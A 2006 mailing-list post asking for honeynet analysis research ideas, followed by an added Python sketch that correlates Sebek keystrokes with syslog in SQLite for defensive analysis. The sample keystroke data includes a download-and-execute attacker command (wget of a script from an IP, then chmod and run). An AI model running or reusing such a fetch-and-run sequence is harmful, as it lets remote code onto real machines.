Research Oct 25 2006 04:00PM
Christos Vasilakis (cvasilak gmail com)
Hi there,

I read with great interest the paper "Towards a Third Generation Data
Capture Architecture for Honeynets" by Edward Balas and Camilo Viecco.
Two years ago I proposed an MSc thesis with the title "Effectiveness
of an Integrated approach for the analysis of Honeynet data". Some
people may remember my question on the lists. Unfortunately, for
personal reasons I had to postpone it. The central part of my thesis was
about developing a tool that will better support the analysis phase of
honeynet data. The basic idea was to integrate the different data
sources (sebek, syslog etc) in a central database and use a kind of
plugin mechanism (i.e. predefined and user-defined SQL queries) to
provide a better view of the attack.

As I understand from the paper, the alliance is spending all its
efforts in improving the analysis phase of Honeynet data. As a
consequence, I believe that my MSc topic becomes kind of obsolete
because there is ongoing work in this area. So I would like to ask
the list for any research ideas in Honeynet technology and in
particular its analysis phase.
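A sketch of the "central database plus query plugins" idea from the post above, as an added example and not code from the original message or from any Honeynet Project tool. It assumes a simplified Sebek record layout (timestamp, honeypot IP, pid, uid, command, keystroke data), a few constructed classic-syslog lines (which carry no year, so 2006 is assumed), and a small honeypot IP-to-hostname table so that the two sources can be joined. Queries are registered by name in a dict; the two predefined ones correlate sshd logins with keystrokes captured shortly afterwards, and look for attacker IPs from syslog that reappear inside typed commands.

```python
"""Toy integrated honeynet store: Sebek keystrokes and syslog in one SQLite
database, analysed through a registry of named SQL "plugin" queries."""
import re
import sqlite3
from datetime import datetime

# Constructed sample data (not real captures). Assumed simplified Sebek
# record shape: (timestamp, honeypot ip, pid, uid, command, keystroke data).
SEBEK_RECORDS = [
    ("2006-10-25 15:58:02", "10.0.0.5", 4121, 0, "bash", "w"),
    ("2006-10-25 15:58:20", "10.0.0.5", 4121, 0, "bash", "wget http://198.51.100.9/x.sh"),
    ("2006-10-25 15:58:41", "10.0.0.5", 4121, 0, "bash", "chmod +x x.sh; ./x.sh"),
    ("2006-10-25 16:45:00", "10.0.0.5", 4300, 0, "bash", "ls"),
    ("2006-10-25 15:21:00", "10.0.0.6", 2250, 1000, "bash", "id"),
]
SYSLOG_LINES = [
    "Oct 25 15:57:55 honey1 sshd[4100]: Accepted password for root from 192.0.2.7 port 40212 ssh2",
    "Oct 25 15:57:56 honey1 sshd[4100]: pam_unix(sshd:session): session opened for user root by (uid=0)",
    "Oct 25 16:30:01 honey1 CRON[4200]: (root) CMD (run-parts /etc/cron.hourly)",
    "Oct 25 15:20:10 honey2 sshd[2210]: Failed password for invalid user admin from 198.51.100.9 port 51022 ssh2",
]
HONEYPOTS = [("10.0.0.5", "honey1"), ("10.0.0.6", "honey2")]
SYSLOG_YEAR = 2006  # classic syslog lines carry no year; assumed here

SYSLOG_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (\S+) ([^\[:]+)(?:\[(\d+)\])?: (.*)$")
REMOTE_IP_RE = re.compile(r"\bfrom (\d{1,3}(?:\.\d{1,3}){3})\b")


def parse_syslog(line):
    """Split one classic syslog line into (iso ts, host, program, pid, message, remote_ip)."""
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable syslog line: {line!r}")
    ts, host, program, pid, msg = m.groups()
    iso = datetime.strptime(f"{SYSLOG_YEAR} {ts}", "%Y %b %d %H:%M:%S").strftime("%Y-%m-%d %H:%M:%S")
    ip = REMOTE_IP_RE.search(msg)
    return (iso, host, program, int(pid) if pid else None, msg, ip.group(1) if ip else None)


SCHEMA = """
CREATE TABLE honeypots(ip TEXT PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE sebek(ts TEXT, host_ip TEXT, pid INTEGER, uid INTEGER, command TEXT, data TEXT);
CREATE TABLE syslog(ts TEXT, host TEXT, program TEXT, pid INTEGER, message TEXT, remote_ip TEXT);
"""


def build_db():
    """Load both data sources into one in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO honeypots VALUES (?, ?)", HONEYPOTS)
    conn.executemany("INSERT INTO sebek VALUES (?, ?, ?, ?, ?, ?)", SEBEK_RECORDS)
    conn.executemany("INSERT INTO syslog VALUES (?, ?, ?, ?, ?, ?)",
                     [parse_syslog(line) for line in SYSLOG_LINES])
    conn.commit()
    return conn


# Query "plugins": name -> (description, SQL). Predefined ones ship with the
# tool; analysts add their own with register_query().
QUERIES = {
    "commands_after_login": (
        "Keystrokes on a honeypot within :window seconds after sshd accepted a login",
        """SELECT l.host, l.ts AS login_ts, l.remote_ip, k.ts AS cmd_ts, k.uid, k.data
           FROM syslog l
           JOIN honeypots h ON h.name = l.host
           JOIN sebek k ON k.host_ip = h.ip
           WHERE l.program = 'sshd' AND l.message LIKE 'Accepted %'
             AND (julianday(k.ts) - julianday(l.ts)) * 86400 BETWEEN 0 AND :window
           ORDER BY k.ts""",
    ),
    "attacker_ip_in_keystrokes": (
        "Remote IPs from syslog that reappear inside commands typed on any honeypot",
        """SELECT DISTINCT l.remote_ip, l.host AS seen_on, h.name AS typed_on, k.data
           FROM syslog l
           JOIN sebek k ON instr(k.data, l.remote_ip) > 0
           JOIN honeypots h ON h.ip = k.host_ip
           WHERE l.remote_ip IS NOT NULL""",
    ),
}


def register_query(name, description, sql):
    """Add a user-defined query; refuses to silently overwrite a predefined one."""
    if name in QUERIES:
        raise KeyError(f"query {name!r} already registered")
    QUERIES[name] = (description, sql)


def run_query(conn, name, params=None):
    """Run a registered query with optional named parameters; returns rows as tuples."""
    _, sql = QUERIES[name]
    return [tuple(r) for r in conn.execute(sql, params or {}).fetchall()]


if __name__ == "__main__":
    conn = build_db()
    register_query("root_shells", "Sebek records where uid 0 typed into a shell",
                   "SELECT ts, host_ip, data FROM sebek WHERE uid = 0 AND command = 'bash' ORDER BY ts")
    for name, (desc, _) in QUERIES.items():
        print(f"== {name}: {desc}")
        for row in run_query(conn, name, {"window": 120}):
            print("  ", row)
```

The join through the honeypots table is the part that matters: Sebek identifies a sensor by IP while syslog carries a hostname, and the two only become one "view of the attack" once that mapping lives in the same database as the events. Time correlation is done in SQL (julianday) rather than in application code, so a user-defined query can reuse it without touching the loader.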


